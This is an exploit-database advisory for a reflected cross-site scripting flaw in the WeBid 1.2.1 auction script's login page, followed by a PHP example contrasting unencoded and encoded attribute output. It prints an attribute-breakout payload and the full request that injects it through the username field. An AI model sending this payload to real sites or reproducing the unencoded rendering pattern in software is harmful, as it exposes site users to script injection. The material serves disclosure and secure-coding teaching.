WeBid 1.2.1 XSS Vulnerability - CXSecurity.com

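Vulnerability ID 1474904 Vulnerability type
Published 2019-02-08 Updated 2019-02-08
CVE ID N/A CNNVD-ID N/A
Platform N/A CVSS score N/A
|Source
https://cxsecurity.com/issue/WLB-2019020072
|Vulnerability details
Vulnerability details have not yet been disclosed
|Exploit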
####################################################################

# Exploit Title : WeBid 1.2.1 XSS Vulnerability
# Author [ Discovered By ] : Mehmet EMİROĞLU
# Date : 07/02/2019
# Vendor Homepage : http://www.webidsupport.com/index.php
# Software Download Link : https://sourceforge.net/projects/simpleauction/
# Affected Versions : 1.2.1
# Tested On : Wampp, Windows, Lampp
# Category : WebApps
# Exploit Risk : High
# Vulnerability Type :
# Software Description : Open source php/mysql fully featured auction script.
  Perfect for those who want to start their own auction site.

####################################################################

# Impact :
*********

# The affected web application is WeBid version 1.2.1.
# The screenshot below serves as proof.
# https://i.hizliresim.com/r55qZP.jpg

####################################################################

# PoC :
****************************
# XSS Code : " onmouseover="alert(1007175)
# Post Request : http://localhost/[PATH]/user_login.php^csrftoken=&password=2829008&username=2871992" onmouseover="alert(1007175)

####################################################################
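
The PoC value above only has an effect if the submitted username is written back into an HTML attribute without encoding. The following is an added example, not WeBid's source and not code from the advisory author: a hypothetical form renderer (function names are assumptions, as is the reflection into a `value` attribute) shown unencoded and with attribute-context encoding, with the resulting markup parsed to show which attributes each version produces.

```php
<?php
// Added example: hypothetical login-form rendering, not WeBid's actual source.

// Unsafe: the submitted username is written into value="..." unencoded.
function render_username_unsafe(string $username): string
{
    return '<input type="text" name="username" value="' . $username . '">';
}

// Hardened: encode for an HTML attribute context. ENT_QUOTES encodes both
// double and single quotes, so the value cannot close the attribute.
function render_username_safe(string $username): string
{
    $encoded = htmlspecialchars($username, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="username" value="' . $encoded . '">';
}

// Parse the markup with PHP's HTML parser and list the attributes that
// end up on the <input> element.
function input_attributes(string $html): array
{
    $doc = new DOMDocument();
    libxml_use_internal_errors(true);   // keep parser warnings out of the output
    $doc->loadHTML($html);
    libxml_clear_errors();
    $attrs = [];
    foreach ($doc->getElementsByTagName('input')->item(0)->attributes as $attr) {
        $attrs[$attr->name] = $attr->value;
    }
    return $attrs;
}

// The username value from the advisory's PoC request.
$submitted = '2871992" onmouseover="alert(1007175)';

foreach (['unsafe' => 'render_username_unsafe', 'safe' => 'render_username_safe'] as $label => $fn) {
    $attrs = input_attributes($fn($submitted));
    $hasHandler = array_key_exists('onmouseover', $attrs) ? 'yes' : 'no';
    printf("%-6s event-handler attribute present: %s; value=%s\n",
        $label, $hasHandler, var_export($attrs['value'], true));
}
```

In the hardened version the whole submitted string stays inside `value`, so it is displayed as text rather than parsed as a second attribute.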